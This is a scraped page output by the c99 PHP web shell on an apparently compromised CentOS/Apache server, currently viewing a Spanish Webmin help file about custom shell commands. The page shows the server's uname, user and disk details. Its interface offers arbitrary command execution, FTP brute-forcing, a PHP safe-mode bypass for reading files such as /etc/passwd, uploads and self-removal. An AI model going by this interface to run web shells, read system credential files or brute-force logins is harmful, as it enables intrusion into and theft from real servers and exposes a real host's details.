!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/custom/help/   drwxr-xr-x
Free 53.75 GB of 127.8 GB (42.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cmd.es.UTF-8.html (1.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Cada comando tiene una descripción (mostrada en la parte inferior de la página principal), y un comando a ejecutar. Esta cadena de comando puede contener operadores de shell como |, > y ; para ejecutar comandos múltiples y líneas de tubería. La cadena también puede contener parámetros como $foo, los cuales son reemplazados por entradas de usuario cuando el comando se ejecuta.

Estos parámetros pueden ser digitados en la tabla de la parte inferior de la página. Para cada parámetro debes de digitar:

Nombre
Un código único para este parámetro. Si el nombre es foo, entonces $foo será reemplazado por el valor de parámetro cuando se ejecuta el comando.

Descripción
La descripción al lado del parámetro en la página principal.

Tipo
Esta opción controla cómo se introduce el parámetro. Las opciones posibles son:
  • Texto
    Una entrada de texto totálmente libre.
  • Usuario
    Un nombre de usuario de tu sistema.
  • UID
    La UID de un usuario de tu sistema.
  • Grupo
    Un nombre de grupo de tu sistema.
  • GID
    La GID de un grupo de tu sistema.
  • Archivo
    La trayectoria completa a un archivo.
  • Directorio
    La trayectoria completa a un directorio.
  • Opción
    Una entrada de Sí/No que pondrá el parámetro a lo que esté en el campo al lado de la entrada de tipo, sólo si se selecciona Sí.
  • Clave de acceso
    Una entrada de texto totalmente libre pero con la entrada reemplazada por *.

¿Entrecomillo parámetro?
En caso de que sí, el parámetro será entrecomillado antes de ser sustituído, permitiendo al usuario entrar valores que contengan espacios.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0108 ]--